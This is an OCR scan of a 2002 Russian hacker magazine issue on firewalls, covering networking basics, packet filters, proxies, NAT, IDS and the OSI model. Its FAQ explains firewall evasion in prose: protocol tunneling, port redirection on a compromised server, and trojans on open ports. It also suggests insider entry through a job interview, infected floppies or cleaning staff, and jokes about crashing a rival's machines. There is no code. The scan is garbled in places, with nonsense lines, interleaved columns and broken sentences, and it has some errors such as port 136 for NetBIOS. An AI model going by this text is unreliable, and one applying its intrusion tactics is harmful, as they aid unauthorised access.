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ТЕХНОТРЕЙД приглашает к сотрудничеству региональных дилеров и магазины розничной торговли. 
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"Hyyyyyy, где же вы <пиб>, ай, выручайте дядю!!!" (с) Ленинград — только и остается завыть, когда утром залогинившись в 
систему, обнаруживаешь девственно пустой кластер хардов, прожранный за ночь месячный трафик всей конторы или 
характерный /var/www/html/index.html.bup, а в самом index.html - какой-нибудь симпотный дефейс... Что тут можно 
сказать: сколько бы всякие бюллетени по сетевой безопасности не капали на мозги, мол, файерволл — это не панацея от 
всех атак, на практике оказывается именно так. \\ \\ \ 
Ох, сколько же админов ограничиваются в секюрности своих систем только настройкой файерволла! А что им делать? 
Там у секретарши ворд не открывается, тут у тупого менеджера файл не печатается, и за всем этим делом надо 
поспевать. А секюрность... Ну, файерволл есть, и то хорошо — большинство хулиганствующих малолеток отвалятся, 
наткнувшись на огненную стену, а если попадется реальный хацкер... А хацкерам в моей сети, типа, делать нечего, ничего 
интересного для них тут нет.\\\\\ 
А потом - "Нуууууу, где же вы <пиб>...!!!" и попа, готовящаяся принять детородный орган начальства. \\ \ \ \ 

Плохо. Не хорошо. Но ничего поделать нельзя, закон природы — голодный и злой всегда пожирает беспечного и 
откормленного. Так что, ребята, давайте приступим к изучению файерволлинга ;) — в жизни пригодится. Этот номер мы 
решили посвятить как раз этому делу: \ \\ \ \ 
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Ну, надеюсь, что очередной Спец даст тебе хорошего пинка в плане изучения сетевой секюрити и устремит тебя дальше 
по той же дорожке с хорошей инерцией :). Увидимся в следующем месяце! \ \ \ \ \ 
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Ч ПУТЕВОДИТЕЛЬ \ Плохие тунели / Хорошие тунели 
Туннелирование - один из основных способов обхода файрволов и других мелких 


препятствий, которые пытаются изобразить бородатые админы. Бедненькие, они ведь 


не знают, с кем воюют! 


ИГРЫ С ШАРАМИ 


Однако сосредоточимся на играх, где шары катают, и у нас получится бильярд, боу- 


Линг, гольф и крокет. Вот они - самые главные шарокатательные игры. 


150/05! \ Семь уровней в мозгу телекоммуникатора... 


Про эту загадочную модель OSI очень любят рассказывать преподы в институте и авто- 


ры в толстых сетевых книжках, причем в самом начале. 


| ЗАЩИЩАЕМСЯ ПОД WIN \ Настройка Agnitum Outpost Firewall 


Трудно раскидывать пальцы в сети, если сам падаешь от первого толчка ламера, 
скачавшего себе Voidozer и даже не представляющего себе, как он работает. 
Еще труднее спокойно спать, будучи админом сервака под NT или 2000. 

Но есть счастье у виндусятников, его надо только скачать и настроить :). 
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ПРИВЕТ. КУПНАЯШКЕР. BOT ТЫ СЕНЧНС ПРОЧИТАЙ НОВЫЙ СПЕЦ-ЯАНЕР 
Н УЖЕ ГОТОВ ПОМЯНУТЬ САНТ МЕЙКОМЯГННЫЯ. ПРОРВНТЬСЯ ЧЕРЕЗ 
&НГРЯЖДЕНЫЯ ПОРТНАЛЯ ННН.НАТО.СОУ. ОШУТИТЬ ОПЬЯНЯЮШИЙ 

ТЕНТЯЙЬНЫЙ ОРГАЗМ. BAanAMbIBAA BASY НРЕДИТОЕ 


Но все это мечты, а знаешь ли ты, как 
вообще построен Интернет? Каким об- 
разом, набирая www.playboy.com, ты 
лицезреешь на своем роскошном 22- 
дюймовом мониторе (я ведь прав?) 
обольстительных красоток, а не потно- 
го фидошника. Что ты сказал? Интер- 
нет - это компьютеры... Хм... Достой- 
ный ответ. А как тогда они соединяют- 
ся? Мдя... Проводами? Да... давай 
разбираться, а то потом будет просто 
стыдно перед слепой девушкой с веса- 
ми, когда будут оглашать приговор... 


Я PAHEH ТАН, ЧТО ВИДЕН МОЗГ 


Что такое Интернет? Интернет - это 
сеть сетей. В таком же случае что та- 
кое сеть, спросишь ты? Сеть - это груп- 
па компьютеров, соединенных между 
собой. Как видишь, определения очень 
расплывчаты, давай разберемся. В 
идеале один комп представляет собой 
сеть, в которой только этот комп и су- 
ществует. У него даже есть ТР адрес - 
127.0.0.1. Т.е. не имея никакой сете- 
вой карты, ты уже имеешь свою ма- 
ленькую сетку с самим собой. Разуме- 
ется, этого мало - допустим, ты и твой 
друг Гоша решили поиграть в кваку, 
для этого ты тащишь к Гоше свой 
комп... сразу же возникает вопрос, а 
как же их соединить? Бежим на Саве- 
ловку, покупаем у барыги две сетевухи 
+ витую пару пару метров. У тебя с Го- 
шей сейчас два компьютера - сетевухи 
вставлены - соединены... но возника- 
ет вопрос: как же компы будут разли- 
чаться? По имени, говоришь? Ты пред- 
ставляешь, сколько в мире компов? Ес- 
ли каждый юзер захочет, чтобы его 
компьютер идентифицировался уни- 


00Ч november/11/2002 


Ныы.РОЕНО.СОМ... 


кальным именем - то никаких слов не 
хватит, и появится масса безликих - 
veryprettysexypornogirl8932 Или 
rulezzzcoolfuckman2971. Я не хочу ни- 
чего сказать, имя компьютера очень 
часто используется в сети (тем более в 
локальной), но так как мы моделируем 
свой маленький Интернет, это имя ос- 
тается вторичным, а идентификация 
компов определяется ТР адресом. По- 
мнишь, в начале статьи мы говорили, 
что у каждого компа есть собственный 
ТР - так вот, он никуда не делся. Пин- 
гуя, ты всегда можешь получить от сво- 
его же компа ответ, но установив сете- 
вые карты (и разумеется, правильно 
настроив их), мы получим два ТР: один 
твой (пусть будет 192.168.0.1), а вто- 


рой для Гоши (192.168.0.2). Мы полу- 
чили маленькую сеть из двух компью- 
теров, которые распознают друг друга 
(по ТР) и, разумеется, в состоянии об- 
мениваться информацией. Все понят- 
но? Тогда усложняем ситуацию... 


Я ЧТО ЭТО ЗЯ ДЕВУШНЯ 
И ГДЕ OHA НИВЕТ? 


Все идет своим чередом... Вы с Гошей 
играете в кваку, но вдруг из другого 
подъезда к вам приходит девочка Али- 
са, которая тоже не прочь поиграть в 
кваку. Получается, что сеть разраста- 
ется. На базе витой пары нельзя со- 
единить более двух компов - придется 
приобретать концетратор (он же хаб 


ИНТЕРНЕТ - СЕТЬ СЕТЕЙ 


РОУТЕР 


Провайдера 


Юзер на модеме 


Локальная 
сеть 


или свитч (switch)). Хабу (удлините- 
лю) наплевать, что за трафик через не- 
го ползет. А свитч же представляет со- 
бой интеллектуальное устройство: все 
дело в том, что любая сетевуха имеет 
собственный уникальный (это очень 
важно) МАС адрес. Так вот, свитч запо- 
минает его и уже контролирует тра- 
фик. 

Постепенно ваша сеть разрастается, 
подключаются новые подъезды, и вы 
задумываетесь - неплохо бы подклю- 
читься к Интернету. Не вопрос! Нахо- 
дите ближайшего провайдера, он ки- 
дает до вашего свитча шнур и выделя- 
ет вам один ТР адрес. Что? Да. Вы не 
ослышались - именно один, на самом 
деле больше и не надо... Мы просто 
подходим к самому интересному. 


НЕ ПЛАЧЬ, АЛИСА, 
ТЫ СТАЛА ВЗРОСЛОЙ 


Возникает масса вопросов... Что за IP 
выделил провайдер, зачем он нужен, 
почему только один? Вернемся к нача- 
лу - вспомни, что у каждого компа ва- 
шей сети есть ТР адреса (у тебя 
192.168.0.1 ит.д.), но эти IP существу- 
ют только в локальной сети и для Ин- 
тернета открыты не будут. Провайдер 
выделяет тебе ТР адрес из своей под- 
сети, но что с ними делать? 

Как им пользоваться? Проведу не- 
большую аналогию - допустим, Гоша 
обиделся на тебя (т.к. тебе Алиса да- 
ла, а ему нет). Он показывает пальцем 
на дверь и отлучает тебя от сети. Ду- 
мает, что ты пропадешь... Фигушки :). 
У тебя еще сохранился модем на 
14400 + аккаунт в Интернет. Ты зво- 
нишь провайдеру - выходишь в Ин- 
тернет. Получаешь ТР, только автома- 
тически, т.к. у провайдера уже стоит 
специальный сервер (DHCP), который 
отвечает за раскидон ТР адресов юзе- 
рам и выполняет всякую черную ра- 
боту (чтобы двум юзерам один и тот 
же адрес не кинуть). Та же самая си- 
туация и слокалкой, только разница в 
том, что на дайлапе ТР у тебя меняет- 
ся от подключения к подключению, а 
в локалке провайдер выделил тебе 
статический ТР, который уже никуда 
не денется. 


ОСТАВЬ ОДЕЖДУ 
ВСЯН СЮДА ВНОДЯЩИЙ 


Ну ладно, допустим - разобрались с 
ТР. А что же делать со шнуром, кото- 
рый кинул провайдер? Совать в свитч! 
Давай решимся на такой экспери- 
мент. .. (хотя на самом деле это ошиб- 
ка). Естественно, чтобы защититься от 
вторжений извне - надо ставить 
файрволл, причем на каждую локаль- 
ную машину. Это хорошо, если у тебя 
в сети 2-3 компа, а если 50? Причем 
поставить - это слабо сказано, надо 
создать правила: блокировка одних 
подсетей, допуск других. Банальный 


пример: допустим, в соседнем городе 
Мухосранске живет (339... существу- 
ет) хакер Жора, который очень хочет 
сломать твою сеть и изнасиловать Го- 
шу. Естественно, вы все (ну, кроме Го- 
ши) хотите блокировать этого варва- 
ра. Ты знаешь его ТР и просто на роу- 
тере прописываешь, что с такого ТР 
пакеты не принимать, а посылать со- 


СХЕМА ИНЕТА 


ПОСМЕЕМСЯ НЕПЛЕР ВЕЛИНОЙ 
ГЛУПОСТИ ЛЮДЕЙ 


А как по твоему, что представляет собой 
сеть провайдера? Чем она отличается от 
твоей? Да, конечно - крутые свитчи, рас- 
пальцованные сервера... А конкретно? 
Радикально? Да ничем! Равно как твоя 


Обрати внимание на маленькую снемку - 
она очень наглядно демонстрирует 
взаимодействие компов в глобальной сети. 
Нак видишь, все очень просто. 

Ho это только на первый взгляд :). 


общение «Network is Unreachable» 
или что-то типа этого. Но заваривает- 
ся интрига: Алиса хочет контактиро- 
вать с Жориком и специально для не- 
го расшаривает папку «C:\My 
Documents\Alice\6ypyHayku» - есте- 
ственно, тебе надо бежать к ней и 
разрешать подключения с Жоркиного 
IP адреса, открывать необходимые 
порты ит.д. А если он у него частень- 
ко меняется или Алиса просто не дала 
Жоржу и они разбежались? Опять бе- 
жать к ней? Нет, фигушки! Нам нужна 
система защиты, которая централизо- 
ванно будет администрироваться (же- 
лательно удаленно) и позволит зада- 
вать правила (рулесы) для всех поль- 
зователей. Для этого вполне подойдет 
роутер - компьютер, через который 
идет трафик из Интернета в локаль- 
ную сеть и наоборот. На нем уже сто- 
ят разные файрволлы, анализаторы 
трафика и т.д., что позволяет адми- 
нить сеть легко и непринужденно. 
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Но вдруг Жора понял, что его перехит- 
рили, он посылает своего провайдера 
на фиг и покупает крутой модем на 
14400, надеясь взломать вашу сеть. Со- 
гласись, блокировать его ТР просто глу- 
по. Хотя бы потому, что он с легкостью 
его сменит, отключившись и вновь 
подключившись к Инету. Но если ты 
знаешь IP адрес сети его провайдера 
(допустим, он 200.200.200.*), то шанс 
поглумиться над Жоржем есть. Тебе 
придется просканить все адреса от 
200.200.200.0 до 200.200.200.255. 
Времени это займет немного, зато ка- 
кой интеллектуальный оргазм получит 
Жорж, увидав синий экранчик смерти 
или еще что похуже. 


сеть является посредником между ком- 
пом Гоши и Интернетом, так и провайдер 
образует связующее звено между твоей 
сетью и Инетом. Связка поистине очень 
проста: комп Гоши -> свитч сетки -> ро- 
утер локалки -> роутер прова -> свитч 
прова (обычно бывает) -> Internet -> 
www.porno.com. А что такое 
WWW. porno.com? Та же самая сеть с web- 
сервером, с файрволлом, с роутером. 
Каких-то компонентов может и не быть 
или они могут быть по-другому реализо- 
ваны. Не суть важно. Главное, что тра- 
фик должен приходить, обрабатываться, 
уходить. В наше тяжелое военное время 
файрволл - это обязательное условие 
построения любой сети, т.к. даже если 
проблема безопасности отсутствует, то 
всегда возникают вопросы о контроле 
трафика (сколько порнухи юзер Саша 
накачал), его стоимости (на сколько 
у.е.), в какое время... 


Что мы поняли? Интернет - это сеть, а 
компьютер - это часть Интернета... Хо- 
телось бы верить, что моя статья по- 
могла разобраться в сложных техно- 
логиях, окружающих нашу жизнь. Ес- 
ли есть вопросы - пиши. Всегда твой и 
только твой маленький и пушистый - 
demiurg(arkhangel@mail.ru). 


КА 


Матушка Лень (MLen@mail.ru) MatushkaLEN’ 


Я забыл, что такое пакет? 


В предыдущих номерах по взлому я 
уже просверлил тебе все уши расска- 
зами про пакеты! В этом номере эк- 
зекуция продолжается, ведь файр- 
воллы, которые так мечтают обойти 
хакеры, работают именно с пакетами! 
Все в нашем сетевом мире крутится 
вокруг этих мусорных пакетиков, по- 
этому ты должен четко себе пред- 
ставлять, зачем они нужны и какие 
бывают. Итак, ты должен запомнить, 
что пакеты состоят из заголовка и 
полезной информации. Заголовок ну- 
жен для того, чтобы доставить пакет 
по нужному адресу. В информацион- 
ном поле может лежать информация 
пользователя, или другой пакет. Если 
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ты не забыл, то когда один пакет 
вложен в другой пакет - это называ- 
ют инкапсуляцией. 


Что такое фильтр паке- 


тов? 


Классический файрволл - это именно 


фильтр пакетов. Фильтр пакетов поз- 
воляет отбрасывать пакеты в зависи- 
мости от адреса получателя, адреса 
отправителя и номера порта. Такой 
фильтр очень полезно ставить для то- 
го, чтобы защитить локальную сеть. 
Например, в локальной сети пользова- 
тели могут использовать протокол 
NetBIOS поверх TCP/IP для обмена 
файлами и доступа к принтерам. Но 
для того, чтобы этот протокол не мог- 
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ли использовать хакеры из глобальной 
сети, на файрволле закрывают 136-й, 
137-й и 139-й порты протокола. 

А бывает, что нужно защитить пользо- 
вателей локальной сети от тлетворного 
влияния всемирной паутины. Для этого 
ласковый администратор закрывает на 
своем файрволле порты Аськи (ICQ) и 
Ирки (IRC), чтобы пользователи рабо- 
тали как рабы на урановых рудниках, 
а не чатились целый день. 

Одним словом, фильтр - это устройст- 
ва или программы, которые отбрасы- 
вают пакеты по заголовку, но в содер- 
жимое не лезут! 


Как файрволл спасает 


от порнухи и рекламы? 


Пакетный фильтр, как ты уже понял, 
умеет отбрасывать пакеты с опреде- 
ленных адресов. То есть если ты ска- 
чаешь из Инета список адресов бан- 
нерных систем, то на твоих страничках 
не будет рекламы. А все потому, что 
пакеты с тошнотными баннерами не 
пропустит твой файрволл. Так же мож- 
но защититься от порносайтов, если у 
тебя не хватает силы воли, и ты начи- 
наешь качать порнуху каждый раз, как 
только зайдешь в сеть. Однако всегда 
найдется порносайт или баннерная 
сеть, о которых не знает твой файр- 
Bonn :). В таких случаях возможностей 
фильтров пакетов уже недостаточно, 
поскольку приходится анализировать 
не только заголовки пакетов, но и их 
содержимое. Например, можно фильт- 
ровать все картинки размером со 
стандартный баннер или анализиро- 
вать сигнатуру женских сисек в загру- 
жаемых картинках. 


Что такое правила 
файрволла? 

Вопрос, конечно, риторический. Ведь 
любому понятно, что этими правилами 
пользуется фильтр пакетов для того, 
чтобы определить, какой пакет пропу- 


стить, какой отбросить, а какой перенаправить. Получаются 
так называют настройки файрволла. И если администратор 
допустил ошибку в составлении правил для своего фильтра, 
то этим обязательно воспользуется сетевой разбойник. От- 
сюда мораль: для того чтобы научиться обходить файрвол- 
лы, хакеры изучают правила фильтрации пакетов. Ну и, ко- 
нечно, существуют списки стандартных ошибок в составле- 
нии правил обхода файрволлов. Эти списки помогают ад- 
минам защищаться, а хакерам обходить файрволлы. 

С помощью правил можно очень тонко настроить свой 
фильтр. Для этого есть три типа правил: входящие, исходя- 
щие и перенаправляемые пакеты. То есть файрволлу можно 
независимо указать, что делать с этими тремя типами паке- 
тов. 


Как пакетный фильтр 
спасает от DOS атак и как 
он лажает? 


На своем фильтре бородатый хранитель сервера может за- 


крыть ICMP порт, по которому проводится распределенная 


защиты от спуфинга: проверять маршрутную информацию. 
То есть фильтр с помощью программы маршрутизации про- 
веряет, в какой сети живет адрес и мог ли он оттуда к нам 
прийти по этому пути. Как не сложно догадаться, метод за- 
щиты слабый и жутко тормозной. А еще нужно его правиль- 
но настроить, чтобы не отбрасывать хорошие пакеты, заблу- 
дившиеся в сети. Спасает это только от спуфинга тупых или 
запрещенных адресов. 


Кто такой прокси-сервер и причем он тут? 


Если ты помнишь, ргоху переводится как представитель. Он 
позволяет тебе лазить в сети так, чтобы все видели только 
адрес прокси-сервера. То есть прокси принимает запрос от 
локального компьютера и передает его в сеть, но уже от 
своего имени. Такое свойство посредника-представителя поз- 
воляет прокси-серверу скрыть реальные |Р-адреса компьюте- 
ров в локальной сети от глаз хакера. Кроме этого, прокси- 
сервер экономит 1Р-адреса, то есть на одном IP может ви- 


сеть целая сеть. 


атака на отказ (000$), или же он может закрыть порты 
NetBIOS. Причем он может сделать такую подлянку хакерам, 
используя простейший пакетный фильтр, встроенный в марш- 
рутизатор. В таком случае маршрутизатор будет отбрасывать 
эти пакеты, вместо того чтобы передать их дальше (маршру- 
тизировать). 

Однако фильтр пакетов не умеет отбрасывать пакеты с под- 
дельным адресом или пакеты с мусором, от которого может 
взглюкнуть сервер. Допустим, хакер атакует сеть бородатого 
админа с определенного IP адреса. Тупой админ запрещает 
файрволлу пропускать пакеты с этого адреса. А хакеру по- 
фиг, он просто вставляет другой поддельный адрес или ата- 
кует с перебором адресов. Вот тут-то файрволл и лажанул- 
ся, нельзя же перекрыть сообщения сразу со всех адресов 
Интернет, сразу по всем портам. Во время такой атаки ло- 
гичнее выдернуть шнур из сервера, целее будет! 


Может ли фильтр защитить 


от IP спуфинга? 


Спуфинг - подделка адреса отправителя 1Р-пакета. Нужно 
это для того, чтобы администратор файрволла не мог за- 
крыть адрес атакующего. Для этого хакер может атаковать с 
сотни поддельных адресов. Все-таки есть один кривой метод 


Такая ситуация очень неприятна для хакера, ведь он не мо- 
жет обратиться к компьютеру в локальной сети, потому что 
прокси-сервер не принимает пакеты, которые не запрашивал. 
Прокси-сервер тесно связан с файрволлом. Например, часто 
файрволл используют для организации прозрачного прокси. 
Для этого сетевой фильтр перенаправляет пакеты на вход 
прокси. То есть прокси существует, но его не видно за фай- 
роволлом. Потому и прозрачный, что за файрволлом. То 
есть представитель прячет от хакерских глаз сеть, а файр- 
волл прячет представителя, тяжело подкопаться. 


Что такое туннелирование? 


Допустим, что у хакера есть бесплатная почта. То есть из 
Интернета он может получать только почту, а хочется по 
страничкам полазить, Аську с Иркой поласкать. Но работает 
только почтовый протокол ЗМТР. Тогда хакер организует 
TCP/IP туннель внутри этого протокола. Идея простая: нуж- 
на программа, которая будет упаковывать обычный TCP/IP в 
пакеты почтового протокола у пользователя. И нужна про- 
грамма, которая будет распаковывать эти пакеты в Интерне- 
те. Для этого тунеядец вешает на каком-нибудь хакнутом 
сервере в Интернете скрипт, который притворяется почтовым 
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сервером, а на самом деле распаковы- 
вает хакерский TCP/IP. 

Получается, что по почтовому протоко- 
лу бегает обычный интернет-трафик. 
Заметь, что файрволл его не видит, 
поскольку не заглядывает в содержи- 
мое пакетов. 

Или, допустим, какой-то провайдер от- 
крыл тестовый вход на свой домашний 
сервер и закрыл на файрволле все 
протоколы кроме DNS (служба домен- 
ных имен). А по протоколу НТТР про- 
вайдер разрешил обращаться только к 
своим серверам, при этом обращения 
к другим серверам провайдерский 
фильтр не пускает. Тогда хакер орга- 
низует туннелирование DNS и сидит в 
Интернете на халяву. 

А если хакер хочет включить себе Ин- 
тернет на работе, в локальной сети за 
файрволлом, он может использовать 
туннелирование Telnet. Прелесть в том, 
что для этого можно использовать 
стандартные программы и не надо ни- 
чего писать. О том, как это сделать, 
читай подробнее на русском языке: 
http: / /www.linuxdoc.ru/ HOWTO /mini/ 
html /Firewall-Piercing.html 
Туннелировать можно любые другие 
протоколы, при этом нужен клиент на 
хакерской машине и сервер в Интерне- 
те. Конечно, это все работает гораздо 
медленнее, чем обычное соединение, 
но это работает! 


Как файрволл от вирусов 


спасает? 


Да никак он от них не спасает. Допус- 


тим, пользователь в локальной сети 
заразился вирусом через ВЕБ-прото- 
кол НТТР при просмотре интернет- 
страничек или ему вирус по почте при- 
слали. Файрволл ведь в пакеты не за- 
глядывает, поэтому вирусы лезут по 
всем возможным протоколам, положив 
огромный болт на фильтры пакетов. 


Спаса ЕТ ли файрволл 


от троянов? 


Многие продвинутые пользователи ду- 


мают, что мощный файрволл не даст 
трояну связаться со своим хозяином- 
хакером, чтобы передать ему пароли. 
А что мешает трояну использовать то- 
же туннелирование и обращаться к 
файрволлу от имени твоего браузера 
или от имени твоей почтовой програм- 
мы по открытым портам? При этом 
приходится выбирать: либо дели Ин- 
тернет с трояном, либо вообще без 
Интернета. Ситуация доводит мирных 
юзверей до истерики: пользователь ви- 
дит, как браузер стучится в порт без 
его ведома, а ничего сделать не мо- 
жет. Ведь обычный файрволл не мо- 
жет отличить пользовательские запро- 
сы от троянских! 


Как и 2 отличия между 


прокси и маскарадингом? 
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Маскарадинг выполняет Te же функ- 
ции, что и ргоху-сервер, то есть маска- 
радинг скрывает адреса компьютеров 
внутренней сети, позволяет локальным 
пользователям работать с сетью через 
один ПР-адрес и не пускает в сеть па- 
кеты, которых не просил. Он также 
связан с файрволлом, только работает 
немного по-другому. Прокси-сервер ус- 
танавливает соединение с локальным 
компьютером, получает от него за- 
прос, по этому запросу выкачивает 
данные из Интернета и отправляет их 


локальному компьютеру. То есть ргоху 
извлекает данные из пакета! Маскара- 
динг - это сервис, который меняет ад- 
peca, перезаписывая заголовок пакета, 
когда тот проходит сквозь фильтр па- 
кетов. То есть он получает пакет с об- 
ратным адресом локального компусте- 
ра, меняет его на свой адрес и отправ- 
ляет в Интернет. Из Интернета он по- 
лучает ответ на свое имя и пересылает 
его на адрес локального компустера, 
который запомнил. 

Получается, что маскарадинг работает 
быстрее, т.к. не извлекает информации 
из пакетов. Поэтому его проще наст- 
роить и приспособить практически к 
любым службам. Ргоху сложнее в на- 
стройках и работает медленнее, зато 
он умеет кэшировать \/ЕВ-странички, 
чтобы сделать их доступными другим 
пользователям. За счет того, что не 
требуется закачивать одни и те же 
странички из Интернета по десять раз, 
благодаря кэширующему ргоху работа 
с Интернетом в локальной сети опти- 
мизируется. 


На что смотрит файрволл, 
кроме адресов и портов? 


Файрволл изучает весь заголовок па- 
кета. Так что вспоминаем, что живет в 
заголовках. Сперва фильтр проверяет 
контрольную сумму и выявляет кривые 
пакеты, которые удаляет. Потом он 
смотрит на структуру заголовка паке- 
та, и если она не совпадает со стан- 
дартной, тоже удаляет. То есть файр- 
волл может удалить сбойный хакер- 
ский пакет, направленный в целях по- 
весить сервер. Дальше файрволл све- 
ряет пакет со своими правилами, и они 
подсказывают, что делать дальше. В 
правилах можно указать запрещенные 
адреса и порты отправителей /получа- 
телей, запрещенные размеры пакетов, 
запрещенные задержки. Можно заста- 
вить фильтр вести логи сбойных паке- 


тов, удалять, перенаправлять пакеты, 
отправлять хакеру сообщение об отка- 
зе работать с ним и, на худой конец, 
бить тревогу в случае чего. 


Что такое редирект портов? 


Часто firewall мешает хакеру ломать 
какой-то сервер. То есть паршивец 
уже захватил администраторские пра- 
ва, а пользоваться сервисами не мо- 
жет - фильтр мешает. Можно, конечно, 
пытаться перенастроить файрволл, что 
не просто и заметно. Но проще пове- 
сить нужный сервис на порт, не при- 
крытый фаерволлом, и использовать 
перенаправления с этого порта на нуж- 
ный злоумышленнику сервис в обход 
файрволла. А все дело в том, что не- 
которые файрволлы оставляют какое- 
то количество портов, на которых ни- 
чего не висит, незакрытыми. Поэтому 
хакер, пользуясь правами администра- 
тора, вешает редирект с нужного пор- 
та на нужную услугу. Естественно, про- 
грамму на хакерском компьютере тоже 
нужно настроить на нестандартный 
порт. Иногда для этого требуется спе- 
циальная программа-редиректор. 

В результате мы имеем обходной путь, 
на который настроенный и отлично 
функционирующий файрволл внимания 
не обращает. 

Кстати, этим грешат многие домашние 
файрволлы и программы защиты от 
хакеров, они перекрывают порты стан- 
дартных хакерских атак, и все. Вместе 
с таким файрволлом отлично уживает- 
ся троян, который садится на нестан- 
дартный порт. 


Как про ще всего обойти 
файрволл? 

Я лично слышал как минимум три рас- 
сказа про то, как сотрудник использо- 
вал личный модем у себя на работе. И 
правильно, наш человек! Хакер даже у 
себя на работе остается хакером. Ад- 
министратор может закрыть на файр- 
волле доступ в Интернет вообще, тог- 
да некоторые сознательные сотрудни- 
ки приходят со своим модемом, благо 
с телефоном проблем нет, на скучной 
работе скучать не придется. 

Так что мало защитить сеть от внешне- 
го проникновения, нужно еще держать 
под прицелом внутреннего врага, до- 
рогие мои администраторы! Ведь боль- 
шая корпоративная сеть совсем не за- 
страхована от физического подключе- 
ния в самом неожиданном месте. Не 
застрахована от хака изнутри, кто ме- 
шает хакеру специально устроиться на 
работу за восемьдесят баксов во вра- 
жескую контору? Или затроянить вра- 
га своей подругой Машей с вредонос- 
ными дискетками? Кто мешает просто 
расспросить своих друзей, которые ра- 
ботают на врага, об устройстве сети? 
Этот способ очень распространен в 
больших организациях. И если все хо- 
рошо защищено снаружи - хакер дей- 
ствует изнутри, прям как в плохих 
фильмах. Только тут не надо изгалять- 
ся с навороченными системами охра- 
ны, достаточно просто прийти в гости 
или на собеседование. Да и сам рабо- 


тодатель посадит хакера за компьютер, чтобы протестить ин- 
теллект, к примеру. 

Кто мешает затроянить контору уборщицей, которая возит 
тряпкой вокруг сервера? Все боятся злобных сетевых хаке- 
ров, ставят мощные файрволлы. Ну а хакеры ходят рядом с 
тобой, пьют твое пиво и стреляют у тебя сигареты. Уволь 
своего админа, при этом забыв ему заплатить, и ты хакнут! 


Что такое анализатор пакетов? 


Допустим, хакер решил затроянить пользователя сети и при- 
слал ему вирус по почте. Глупый пользователь запустил тро- 
янского коня, и тот размножился по всей сети и обошел 
фильтр изнутри. Опять файрволл лажанулся, пропустив пакет 
с вирусом! 

Чтобы избежать таких проблем, используют анализаторы па- 
кетов. Это такие программы или устройства, которые не ог- 
раничиваются информацией заголовка и лезут в содержимое 
пакета. Сетевые анализаторы могут проверять трафик на на- 
личие вирусных сигнатур (цифровых отпечатков вирусных 
пальцев), на наличие туннеля другого протокола, на опреде- 
ленные слова или участки кода. 

С помощью анализатора пакетов можно даже отучить пользо- 
вателей ругаться матом в письмах. Только анализатор рабо- 
тает очень медленно, ведь распаковывать каждый пакет дело 
не быстрое, особенно когда они валятся с хорошей скоро- 
стью. 

Да и глубина проникновения этого любителя грязного белья 
оставляет желать лучшего. Можно научить анализатор опре- 
деленным фокусам, но хакеры все время придумывают что-то 
новенькое. Поэтому набор фокусов приходится постоянно об- 
новлять. Ргоху-сервер - один из примеров анализатора паке- 
тов. 
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Что такое система обнаружения атак? 


Сейчас в Интернете очень модная тема. Серьезные дядьки 
классифицируют хакерские атаки и даже их стандартизируют. 
На основе этих стандартов пишут системы обнаружения атак. 
Есть масса косвенных признаков атаки, при которых система 
должна кричать караул или самостоятельно бороться со 
взломщиком. Такая система использует логи файрволла, дан- 
ные анализатора пакетов, следит за целостностью системных 
файлов и стоит очень дорого. 


Что такое сетевой экран? 


В современном мире даже самому неграмотному администра- 
тору не придет в голову защищаться только фильтром паке- 
тов. Он обязательно накрутит туда прокси, маскарадинг, ана- 
лизатор пакетов для отлова вирусов и даже новомодную сис- 
тему обнаружения атак. Так что в реальности хакеру прихо- 
дится обходить не Файрволл в его традиционным понимании, 
а сетевой экран, то есть целую систему страхующих друг 
друга заслонов. Даже домашние персональные файрволлы 
выходят за рамки обычного фильтра пакетов. 

Часто сетевой экран называют привычным словом FireWall, 
хотя он сильно мутировал с тех пор. 


Что такое аппаратный сетевой экран? 


Если у организации много денег и серьезные требования не 
только к безопасности, но и к скорости, то принимается ре- 
шение установить аппаратный экран. Если от межсетевого эк- 
рана требуется достаточно глубоко анализировать сетевые 
пакеты на высоких скоростях, то обычное программное обес- 
печение поверх обычного компьютера уже не справляется. 
Поэтому нужные функции полезно разместить в железе. То 
есть все функции экрана будут реализованы на микросхемах. 
Чтобы апгрейдить такой железный экран поддержкой новых 
протоколов, в его флеш-память заливают новую прошивку, 
как в обычный модем. Иногда аппаратный межсетевой экран 
выполняет заодно функции маршрутизатора. 

Иногда аппаратным файрволлом называют специальный ком- 
пьютер, который купили с уже предустановленной операцион- 
ной системой и установленной программой сетевого экрана. 
Такое чудо-юдо называют аппаратным скорее в рекламных 
целях, чтобы запудрить мозги покупателям. Ведь все знают, 
что аппаратный межсетевой экран - это круто. 
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— СЕМЬ УРОВНЕЙ в мозгу 


телекоммуникатора, ИЛИ как не 
запутаться в протоколах 


Матушка Лень (MLEN@mail.ru) Ма aLEN' [LoveTech] 


Вот уже несколько номеров подряд мы загружаем твой мозг 
информацией о протоколах. Протоколов очень много, и воз- 
никает путаница, как с нею бороться? Для того чтобы теле- 
коммуникатор не сошел с ума и не запутался в проводах 
Международная Организация Стандартизации (150 - 
International Standardization Organization) разработала модель 
Взаимодействия Открытых Систем (OSI - Open ат 
Interconnection). Сокращенно получилось ISO/OSI. 


рис. 


Константин Комардин 


Про эту загадочную модель OSI очень любят рассказывать преподы в ин- 
ституте и авторы в толстых сетевых книжках, причем в самом начале. Не 
удивительно, что новичок ничего не понимает. Другое дело - рассказать 
про OSI человеку, который уже знает какие-то протоколы и имеет вопросы. 
Для него модель взаимодействия открытых систем станет ОЗАРЕНИЕМ. Нор- 
мальный телекоммуникатор так хорошо умеет анализировать системы свя- 
зи потому, что у него в голове все раскладывается по семи удобным полоч- 
кам - по семи стандартным уровням. Хакер также должен обладать такой 
прозорливостью, чтобы четко понимать, что происходит. Хакер должен про- 
лезть через ФАЙРВОЛЛ и при этом не попасться, 150/051 для него настоя- 
щая карта вражеской территории! 

В учебниках и доках все написано очень сухо. Наша с тобой задача на- 
учиться применять 150 на практике. Постепенно ты поймешь, что давно 
применяешь О5Т, только подсознательно. 


Физический уровень 


Правильнее называть этот уровень механически-электрическим. На этом 
уровне живут типы проводов, типы разъемов, уровни напряжения, сигналы, 
модуляции. На практике ты идешь покупать себе внешний модем. Модем 
нужно выбрать с евророзеткой под телефонный кабель, с разъемом под 
компорт на 25 штырьков или на 9 штырьков, либо USB или РСТ. Ты подбира- 
ешь параметры физического уровня ISO/OSI. Дальше ты должен выбрать 
модем с хорошим набором физических протоколов, например, V.34, V.90, 
V.95, K56flex. Эти протоколы отвечают за сигналы, чем круче закодированы 
сигналы, тем быстрее модем передает инфу. Кроме обычного телефонного 


модема, бывают модемы кабельные, спутниковые, радиомодемы и модемы 
выделенных линий, все это особенности физического уровня. 

